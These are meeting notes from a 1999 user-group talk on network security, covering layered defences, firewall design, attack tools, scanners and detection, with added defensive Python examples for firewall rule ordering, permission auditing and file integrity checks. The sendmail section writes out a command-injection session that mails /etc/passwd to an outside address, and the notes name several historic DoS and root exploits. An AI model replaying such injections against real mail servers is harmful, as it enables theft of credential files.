Network Security - December 14, 1999

Here are Eric's slides.

Meeting Notes

Taken by David Kramer

Q&A

ns threads

Sun has kernel threads, fully multiprocessing.

Very little difference between kernel threads and processes under Sun, but they all have the same PID, so they'll all be on one line in ps.

George Peron(?sp) has small luggable pentiums

How can other companies offer DSL to you over your existing lines where the phone company can't?

Often they lie, and they can't.

They offer slower speeds for poorer cables.

Announcements

Next meeting in 4-370, joint with AIP.

Meeting-

Michael Hayes and Eric Cole of Vista Info Securities

eric.cole@vistait.com or eric7095@aol.com

slides will be at http://www.blu.org/meetings/1999/dec/presentation.htm

Lots of F100 companies:

pay less for networks and security than for coffee and soft drinks.

hire unknown Y2K experts who may be putting in back doors, and know all the passwords (which the companies typically won't change).

Lots of F100 companies have no security policies, or allow everything outbound.

"Depth of security"- like castles. Always rely on multiple levels of security, some of which are designed merely for detection, some merely for slowing down attackers.

70% of attacks involve insiders.

AAA

Admin- passwords.

Authorizing- Control who can get to what.

Accounting- Recording who has done what.

Insurance companies may not pay for Y2K or security losses if they can prove you were negligent.

Honeypot- Set up a system that looks like the real system to attract hackers and log heavily.

He says this is a bad idea. Don't attract attention.

NT should never be used as a firewall. The OS itself is not secure enough.

Hardening- removing unwanted services, etc.

(cloud)--[Router]--[Pix fw]--(DMZ/servers)--[Linux fw]-(inside)

Don't put mail server in DMZ. Proxy it to the inside.

There are hacker websites that have the source code for NT, firewall1, Solaris, etc. If the source code could get out, it could be modified and get put back in with back doors.

In Netscape, type link://kramer.ne.mediaone.net to find sites that link to your site.

www.grc.com Gibson Research.

Attack tools

WinNuke- Just type in the IP address of a Win95/98/NT box and this kills it. Connects to 139 (NetBIOS). It sends out-of-band data that the target isn't expecting.

l0phtcrack.

sendmail

mail from: "/bin/mail me@host < /etc/passwd"

.. sender ok

rcpt to: mickeymouse

550 unknown user

data

354 enter mail .

Linux exploits

2.2 frag ICMP kernel panic

SDI-pop2 during IMAP anonymous_login() uid is nobody

SDI wu-ftp will let you execute commands as root if you have write access to the server

Sesquipedalian- DoS, Linux 2.1.89-2.2.3: zero-length fragment bug.

procrace- Linux 2.2.1 contains a /proc race condition allowing local users to crash the kernel.

Linux 2.0.36+ automount allows normal users to gain root via a kernel overflow.

Tools

Runs on host

ipchains/ipfwadm

Specific rules first, more general rules later.

IPChains adds

portfw

chains, intricate rules

quality of service routing

ip/port/interface negation with not (!)

ipfwadm2ipchains

Mason- figures your rules by watching what you do.
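The "specific rules first, more general rules later" point above is about first-match evaluation: the first rule a packet matches decides its fate, so a broad deny placed ahead of a narrow accept silently swallows the exception. The following is an added example (not part of the meeting notes, and not ipchains code) that simulates a first-match chain with the ipchains-style "!" source negation; Rule, Packet and evaluate are hypothetical names, and the addresses are constructed sample values.

```python
"""First-match evaluation of a packet-filter chain (added example).

Shows why "specific rules first, more general rules later" matters in a
first-match filter such as ipchains. Rule/Packet/evaluate are hypothetical
names; the addresses below are constructed sample values.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass(frozen=True)
class Packet:
    src: str                     # source IP address
    proto: str                   # "tcp", "udp" or "icmp"
    dport: Optional[int] = None  # destination port, if any


@dataclass(frozen=True)
class Rule:
    target: str                  # "ACCEPT" or "DENY"
    src: str = "0.0.0.0/0"       # source network; the default matches anything
    proto: str = "any"           # "tcp", "udp", "icmp" or "any"
    dport: Optional[int] = None  # destination port; None matches any port
    negate_src: bool = False     # like ipchains' "! source" inversion

    def matches(self, pkt: Packet) -> bool:
        in_src = ip_address(pkt.src) in ip_network(self.src)
        if in_src == self.negate_src:  # negation flips the source test
            return False
        if self.proto != "any" and self.proto != pkt.proto:
            return False
        if self.dport is not None and self.dport != pkt.dport:
            return False
        return True


def evaluate(chain: List[Rule], pkt: Packet, policy: str = "DENY") -> str:
    """Return the target of the first matching rule, else the chain policy."""
    for rule in chain:
        if rule.matches(pkt):
            return rule.target
    return policy


# The same three rules, ordered correctly and incorrectly.
SPECIFIC_FIRST = [
    Rule("ACCEPT", src="10.1.2.3/32", proto="tcp", dport=22),  # one admin host
    Rule("DENY", src="10.0.0.0/8"),                            # the rest of the LAN
    Rule("ACCEPT", proto="tcp", dport=80),                     # web open to everyone
]
GENERAL_FIRST = [SPECIFIC_FIRST[1], SPECIFIC_FIRST[0], SPECIFIC_FIRST[2]]


def demo():
    """Admin SSH is accepted only when the specific rule comes first."""
    admin_ssh = Packet("10.1.2.3", "tcp", 22)
    return evaluate(SPECIFIC_FIRST, admin_ssh), evaluate(GENERAL_FIRST, admin_ssh)


if __name__ == "__main__":
    print(demo())  # ('ACCEPT', 'DENY')
```

In GENERAL_FIRST the admin host's packet matches the 10.0.0.0/8 deny before its own accept is ever consulted, which is exactly the failure the ordering advice guards against; a chain review should walk each intended exception through the rules in order the same way.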

netfilter

next gen packet firewalling

check.pl checks file/dir permissions/setuids.

cops (old)

tiger (under devel)
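The host-side checkers above (check.pl, cops, tiger) all look for the same classes of finding: set-uid and set-gid executables, and world-writable files and directories. As an added example (not the code of any of those tools), the script below walks a tree without following symlinks and reports those findings; classify, audit and walk are hypothetical names, and the entries in demo() are constructed so the block runs without touching the real filesystem.

```python
"""Audit directory entries for set-uid/set-gid bits and world-writable
permissions (added example; not check.pl, cops or tiger code).

Function names are hypothetical; demo() uses constructed sample entries.
"""
import os
import stat
from typing import Dict, Iterable, List, Tuple

Entry = Tuple[str, int, int]  # (path, st_mode, st_uid)


def classify(mode: int, uid: int) -> List[str]:
    """Return the findings for one entry (empty list means clean)."""
    findings = []
    if stat.S_ISREG(mode) and mode & stat.S_ISUID:
        findings.append("setuid" + (" root" if uid == 0 else ""))
    if stat.S_ISREG(mode) and mode & stat.S_ISGID:
        findings.append("setgid")
    if mode & stat.S_IWOTH:
        # A world-writable directory without the sticky bit lets any user
        # delete or rename other users' files inside it; /tmp-style
        # directories with the sticky bit set are expected and skipped.
        if stat.S_ISDIR(mode) and not mode & stat.S_ISVTX:
            findings.append("world-writable dir without sticky bit")
        elif not stat.S_ISDIR(mode):
            findings.append("world-writable")
    return findings


def audit(entries: Iterable[Entry]) -> Dict[str, List[str]]:
    """Map path -> findings for every entry with at least one finding."""
    report = {}
    for path, mode, uid in entries:
        found = classify(mode, uid)
        if found:
            report[path] = found
    return report


def walk(root: str) -> Iterable[Entry]:
    """Yield (path, mode, uid) for everything under root; symlinks are
    lstat'ed, not followed, so a planted link cannot redirect the scan."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            yield full, st.st_mode, st.st_uid


def demo() -> Dict[str, List[str]]:
    """Constructed entries shaped like what walk() would yield."""
    sample = [
        ("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755, 0),
        ("/tmp", stat.S_IFDIR | stat.S_ISVTX | 0o777, 0),
        ("/var/spool/junk", stat.S_IFDIR | 0o777, 0),
        ("/home/alice/notes", stat.S_IFREG | 0o666, 1000),
        ("/home/alice/script", stat.S_IFREG | stat.S_ISUID | 0o755, 1000),
        ("/etc/hosts", stat.S_IFREG | 0o644, 0),
    ]
    return audit(sample)


if __name__ == "__main__":
    import sys
    report = audit(walk(sys.argv[1])) if len(sys.argv) > 1 else demo()
    for path, findings in sorted(report.items()):
        print(f"{path}: {', '.join(findings)}")
```

Run it with a directory argument to scan a real tree (as root, so nothing is skipped for lack of permission), or without one to see the constructed sample. Expected setuid-root binaries such as passwd still show up; the useful practice is to keep a known-good list and diff against it, so only new or unexpected entries need attention.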

Runs outside

strobe- old port scanning tool

nmap

queso- checks for well-known attacks, not really a port scanner

nessus- very good scanning tool

Saint- like Satan

Cheops checks for OS vulnerabilities

ftpcheck/relaycheck checks for servers that relay

SARA Security Auditor's Research Assistant- like Satan.

BASS Bulk Auditing Security Scanner- Scan several servers.

Detection

tripwire
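Tripwire's detection model is a stored baseline of file fingerprints that is later compared against the live filesystem, so that files added, removed or altered since the baseline stand out. The following is an added example, not Tripwire's own code: a SHA-256 baseline of a tree and a comparison that reports the three kinds of change. fingerprint, build_baseline and compare are hypothetical names, and demo() builds a constructed tree in a temporary directory so it runs offline.

```python
"""Tripwire-style integrity check: baseline a tree, then compare
(added example; not Tripwire's code). Names are hypothetical and the
tree built in demo() is constructed.
"""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

Fingerprint = Tuple[str, int, int]   # (sha256 hex digest, size, permission bits)
Baseline = Dict[str, Fingerprint]    # path relative to the root -> fingerprint


def fingerprint(path: str) -> Fingerprint:
    """Hash the contents in chunks and record size and mode bits."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    st = os.stat(path)
    return h.hexdigest(), st.st_size, st.st_mode & 0o7777


def build_baseline(root: str) -> Baseline:
    """Fingerprint every regular file under root (symlinks are skipped)."""
    base: Baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            base[os.path.relpath(full, root)] = fingerprint(full)
    return base


def compare(old: Baseline, new: Baseline) -> Dict[str, List[str]]:
    """Report paths added, removed or modified between two baselines."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def demo() -> Dict[str, List[str]]:
    """Build a small constructed tree, baseline it, change it, and compare."""
    with tempfile.TemporaryDirectory() as root:
        etc = os.path.join(root, "etc")
        os.mkdir(etc)
        with open(os.path.join(etc, "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")
        with open(os.path.join(etc, "hosts"), "w") as f:
            f.write("127.0.0.1 localhost\n")
        before = build_baseline(root)

        # Simulated changes: an extra passwd line, a deleted file, a new file.
        with open(os.path.join(etc, "passwd"), "a") as f:
            f.write("extra:x:0:0:extra:/:/bin/sh\n")
        os.remove(os.path.join(etc, "hosts"))
        with open(os.path.join(root, "unexpected.bin"), "wb") as f:
            f.write(b"\x00")
        after = build_baseline(root)
        return compare(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The comparison is only as trustworthy as the stored baseline: keep it (and the checker itself) on read-only or offline media, since an intruder who can rewrite the baseline can hide any change. Mode bits are part of the fingerprint so a chmod that adds a set-uid bit is reported as a modification even when the contents are untouched.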